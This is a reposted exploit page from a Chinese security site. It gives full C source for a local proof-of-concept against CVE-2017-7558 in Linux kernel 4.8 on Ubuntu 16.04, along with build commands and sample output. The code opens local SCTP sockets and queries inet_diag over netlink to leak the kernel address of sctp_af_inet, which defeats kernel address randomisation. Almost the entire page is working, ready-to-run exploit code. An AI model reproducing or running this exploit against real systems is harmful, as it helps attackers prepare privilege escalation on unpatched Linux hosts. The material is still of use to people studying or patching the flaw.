首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer
来源:jinb.park7@gmail.com 作者:Park 发布时间:2018-12-03  
# Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer
# Google Dork: -
# Date: 2018-11-20
# Exploit Author: Jinbum Park
# Vendor Homepage: -
# Software Link: -
# Version: Linux Kernel 4.8 (Ubuntu 16.04)
# Tested on: 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
# CVE: 2017-7558
# Category: Local
 
/*
 * [ Briefs ]
 *    - CVE-2017-7558 has discovered and reported by Stefano Brivio of the Red Hat. (but, no publicly available exploit)
 *    - This is local exploit against the CVE-2017-7558.
 *
 * [ Tested version ]
 *    - 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 *
 * [ Prerequisites ]
 *    - sudo apt-get install libsctp-dev
 *
 * [ Goal ]
 *    - Leak kernel symbol address of "sctp_af_inet"
 *
 * [ Run exploit ]
 *    - $ gcc poc.c -o poc -lsctp -lpthread
 *    - $ ./poc
 *      [] Waiting for connection
 *      [] New client connected
 *      [] Received data: Hello, Server!
 *      [] sctp_af_inet address : 0
 *      [] sctp_af_inet address : ffffffffc0c541e0
 *      [] sctp_af_inet address : 0
 *      [] sctp_af_inet address : ffffffffc0c541e0  (leaked kernel pointer)
 *    - $ sudo cat /proc/kallsyms | grep sctp_af_inet  (Check whether leaked pointer value is corret)
 *      ffffffffc0c541e0 d sctp_af_inet [sctp]
 *
 * [ Contact ]
 *    - jinb.park7@gmail.com
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <asm/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <pwd.h>
#include <pthread.h>
#include <errno.h>
 
#define MY_PORT_NUM 62324
 
struct sctp_info {
    __u32   sctpi_tag;
    __u32   sctpi_state;
    __u32   sctpi_rwnd;
    __u16   sctpi_unackdata;
    __u16   sctpi_penddata;
    __u16   sctpi_instrms;
    __u16   sctpi_outstrms;
    __u32   sctpi_fragmentation_point;
    __u32   sctpi_inqueue;
    __u32   sctpi_outqueue;
    __u32   sctpi_overall_error;
    __u32   sctpi_max_burst;
    __u32   sctpi_maxseg;
    __u32   sctpi_peer_rwnd;
    __u32   sctpi_peer_tag;
    __u8    sctpi_peer_capable;
    __u8    sctpi_peer_sack;
    __u16   __reserved1;
 
    /* assoc status info */
    __u64   sctpi_isacks;
    __u64   sctpi_osacks;
    __u64   sctpi_opackets;
    __u64   sctpi_ipackets;
    __u64   sctpi_rtxchunks;
    __u64   sctpi_outofseqtsns;
    __u64   sctpi_idupchunks;
    __u64   sctpi_gapcnt;
    __u64   sctpi_ouodchunks;
    __u64   sctpi_iuodchunks;
    __u64   sctpi_oodchunks;
    __u64   sctpi_iodchunks;
    __u64   sctpi_octrlchunks;
    __u64   sctpi_ictrlchunks;
 
    /* primary transport info */
    struct sockaddr_storage sctpi_p_address;
    __s32   sctpi_p_state;
    __u32   sctpi_p_cwnd;
    __u32   sctpi_p_srtt;
    __u32   sctpi_p_rto;
    __u32   sctpi_p_hbinterval;
    __u32   sctpi_p_pathmaxrxt;
    __u32   sctpi_p_sackdelay;
    __u32   sctpi_p_sackfreq;
    __u32   sctpi_p_ssthresh;
    __u32   sctpi_p_partial_bytes_acked;
    __u32   sctpi_p_flight_size;
    __u16   sctpi_p_error;
    __u16   __reserved2;
 
    /* sctp sock info */
    __u32   sctpi_s_autoclose;
    __u32   sctpi_s_adaptation_ind;
    __u32   sctpi_s_pd_point;
    __u8    sctpi_s_nodelay;
    __u8    sctpi_s_disable_fragments;
    __u8    sctpi_s_v4mapped;
    __u8    sctpi_s_frag_interleave;
    __u32   sctpi_s_type;
    __u32   __reserved3;
};
 
enum {
    SS_UNKNOWN,
    SS_ESTABLISHED,
    SS_SYN_SENT,
    SS_SYN_RECV,
    SS_FIN_WAIT1,
    SS_FIN_WAIT2,
    SS_TIME_WAIT,
    SS_CLOSE,
    SS_CLOSE_WAIT,
    SS_LAST_ACK,
    SS_LISTEN,
    SS_CLOSING,
    SS_MAX
};
 
enum sctp_state {
    SCTP_STATE_CLOSED       = 0,
    SCTP_STATE_COOKIE_WAIT      = 1,
    SCTP_STATE_COOKIE_ECHOED    = 2,
    SCTP_STATE_ESTABLISHED      = 3,
    SCTP_STATE_SHUTDOWN_PENDING = 4,
    SCTP_STATE_SHUTDOWN_SENT    = 5,
    SCTP_STATE_SHUTDOWN_RECEIVED    = 6,
    SCTP_STATE_SHUTDOWN_ACK_SENT    = 7,
};
 
enum {
    TCP_ESTABLISHED = 1,
    TCP_SYN_SENT,
    TCP_SYN_RECV,
    TCP_FIN_WAIT1,
    TCP_FIN_WAIT2,
    TCP_TIME_WAIT,
    TCP_CLOSE,
    TCP_CLOSE_WAIT,
    TCP_LAST_ACK,
    TCP_LISTEN,
    TCP_CLOSING,    /* Now a valid state */
    TCP_NEW_SYN_RECV,
 
    TCP_MAX_STATES  /* Leave at the end! */
};
 
enum sctp_sock_state {
    SCTP_SS_CLOSED         = TCP_CLOSE,
    SCTP_SS_LISTENING      = TCP_LISTEN,
    SCTP_SS_ESTABLISHING   = TCP_SYN_SENT,
    SCTP_SS_ESTABLISHED    = TCP_ESTABLISHED,
    SCTP_SS_CLOSING        = TCP_CLOSE_WAIT,
};
 
static volatile int servser_stop_flag = 0;
static volatile int client_stop_flag = 0;
 
static void *server_thread(void *arg) {
    int listen_fd, conn_fd, flags, ret, in;
    char buffer[1024];
    struct sctp_sndrcvinfo sndrcvinfo;
    struct sockaddr_in servaddr = {
            .sin_family = AF_INET,
            .sin_addr.s_addr = htonl(INADDR_ANY),
            .sin_port = htons(MY_PORT_NUM),
    };
    struct sctp_initmsg initmsg = {
            .sinit_num_ostreams = 5,
            .sinit_max_instreams = 5,
            .sinit_max_attempts = 4,
    };
 
    listen_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if (listen_fd < 0)
        return NULL;
 
    ret = bind(listen_fd, (struct sockaddr *) &servaddr, sizeof(servaddr));
    if (ret < 0)
        return NULL;
 
    ret = setsockopt(listen_fd, IPPROTO_SCTP, SCTP_INITMSG, &initmsg, sizeof(initmsg));
    if (ret < 0)
        return NULL;
 
    ret = listen(listen_fd, initmsg.sinit_max_instreams);
    if (ret < 0)
        return NULL;
    
    printf("[] Waiting for connection\n");
 
    conn_fd = accept(listen_fd, (struct sockaddr *) NULL, NULL);
    if(conn_fd < 0)
        return NULL;
 
    printf("[] New client connected\n");
 
    in = sctp_recvmsg(conn_fd, buffer, sizeof(buffer), NULL, 0, &sndrcvinfo, &flags);
    if (in > 0) {
        printf("[] Received data: %s\n", buffer);
    }
 
    while (servser_stop_flag == 0)
        sleep(1);
 
    close(conn_fd);
    return NULL;
}
 
static void *client_thread(void *arg) {
    int conn_fd, ret;
    const char *msg = "Hello, Server!";
    struct sockaddr_in servaddr = {
            .sin_family = AF_INET,
            .sin_port = htons(MY_PORT_NUM),
            .sin_addr.s_addr = inet_addr("127.0.0.1"),
    };
 
    conn_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    if (conn_fd < 0)
        return NULL;
 
    ret = connect(conn_fd, (struct sockaddr *) &servaddr, sizeof(servaddr));
    if (ret < 0)
        return NULL;
 
    ret = sctp_sendmsg(conn_fd, (void *) msg, strlen(msg) + 1, NULL, 0, 0, 0, 0, 0, 0 );
    if (ret < 0)
         return NULL;
 
    while (client_stop_flag == 0)
        sleep(1);
 
    close(conn_fd);
    return NULL;
}
 
//Copied from libmnl source
#define SOCKET_BUFFER_SIZE (getpagesize() < 8192L ? getpagesize() : 8192L)
 
int send_diag_msg(int sockfd){
    struct msghdr msg;
    struct nlmsghdr nlh;
    struct inet_diag_req_v2 conn_req;
    struct sockaddr_nl sa;
    struct iovec iov[4];
    int retval = 0;
 
    //For the filter
    struct rtattr rta;
    void *filter_mem = NULL;
    int filter_len = 0;
 
    memset(&msg, 0, sizeof(msg));
    memset(&sa, 0, sizeof(sa));
    memset(&nlh, 0, sizeof(nlh));
    memset(&conn_req, 0, sizeof(conn_req));
 
    sa.nl_family = AF_NETLINK;
 
    conn_req.sdiag_family = AF_INET;
    conn_req.sdiag_protocol = IPPROTO_SCTP;
    conn_req.idiag_states = SCTP_SS_CLOSED;
    conn_req.idiag_ext |= (1 << (INET_DIAG_INFO - 1));
    
    nlh.nlmsg_len = NLMSG_LENGTH(sizeof(conn_req));
    nlh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
 
    nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    iov[0].iov_base = (void*) &nlh;
    iov[0].iov_len = sizeof(nlh);
    iov[1].iov_base = (void*) &conn_req;
    iov[1].iov_len = sizeof(conn_req);
 
    //Set essage correctly
    msg.msg_name = (void*) &sa;
    msg.msg_namelen = sizeof(sa);
    msg.msg_iov = iov;
    if(filter_mem == NULL)
        msg.msg_iovlen = 2;
    else
        msg.msg_iovlen = 4;
   
    retval = sendmsg(sockfd, &msg, 0);
 
    if(filter_mem != NULL)
        free(filter_mem);
 
    return retval;
}
 
void parse_diag_msg(struct inet_diag_msg *diag_msg, int rtalen){
    struct rtattr *attr;
    struct sctp_info *sctpi;
    int i;
    unsigned char *ptr;
 
    if(diag_msg->idiag_family != AF_INET && diag_msg->idiag_family != AF_INET6) {
        fprintf(stderr, "Unknown family\n");
        return;
    }
 
    if(rtalen > 0){
        attr = (struct rtattr*) (diag_msg+1);
 
        while(RTA_OK(attr, rtalen)){
            if(attr->rta_type == INET_DIAG_INFO){
                // leak kernel pointer here!!
                sctpi = (struct sctp_info*) RTA_DATA(attr);
                ptr = ((unsigned char *)&sctpi->sctpi_p_address + 32);
                printf("[] sctp_af_inet address : %lx\n", *(unsigned long *)ptr);
            }
            attr = RTA_NEXT(attr, rtalen);
        }
    }
}
 
int main(int argc, char *argv[]){
    int nl_sock = 0, numbytes = 0, rtalen = 0;
    struct nlmsghdr *nlh;
    uint8_t recv_buf[SOCKET_BUFFER_SIZE];
    struct inet_diag_msg *diag_msg;
    pthread_t sctp_server;
    pthread_t sctp_client;
 
    // run sctp server & client
    if (pthread_create(&sctp_server, NULL, server_thread, NULL))
        return EXIT_FAILURE;
    sleep(2);
 
    if (pthread_create(&sctp_client, NULL, client_thread, NULL))
        return EXIT_FAILURE;
    sleep(2);
 
    // run inet_diag
    if((nl_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_INET_DIAG)) == -1){
        perror("socket: ");
        return EXIT_FAILURE;
    }
 
    if(send_diag_msg(nl_sock) < 0){
        perror("sendmsg: ");
        return EXIT_FAILURE;
    }
 
    while(1){
        numbytes = recv(nl_sock, recv_buf, sizeof(recv_buf), 0);
        nlh = (struct nlmsghdr*) recv_buf;
 
        while(NLMSG_OK(nlh, numbytes)){
            if(nlh->nlmsg_type == NLMSG_DONE) {
                return EXIT_SUCCESS;
            }
 
            if(nlh->nlmsg_type == NLMSG_ERROR){
                fprintf(stderr, "Error in netlink message\n");
                return EXIT_FAILURE;
            }
 
            diag_msg = (struct inet_diag_msg*) NLMSG_DATA(nlh);
            rtalen = nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*diag_msg));
            parse_diag_msg(diag_msg, rtalen);
 
            nlh = NLMSG_NEXT(nlh, numbytes);
        }
    }
    printf("loop next\n");
 
    // exit threads
    client_stop_flag = 1;
    if (pthread_join(sctp_client, NULL))
        return EXIT_FAILURE;
 
    servser_stop_flag = 1;
    if (pthread_join(sctp_server, NULL))
        return EXIT_FAILURE;
 
    printf("end\n");
    return EXIT_SUCCESS;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Schneider Electric PLC - Sessi
·HTML5 Video Player 1.2.5 - Buf
·knc (Kerberized NetCat) Denial
·xorg-x11-server < 1.20.3 - 'mo
·WebKit JSC - BytecodeGenerator
·VBScript - 'OLEAUT32!VariantCl
·WebKit JIT - 'ByteCodeParser::
·VBScript - 'rtFilter' Out-of-B
·WebKit JSC JIT - 'JSPropertyNa
·Apache Spark - Unauthenticated
·Unitrends Enterprise Backup bp
·Joomla JCE 2.6.33 Arbitrary Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved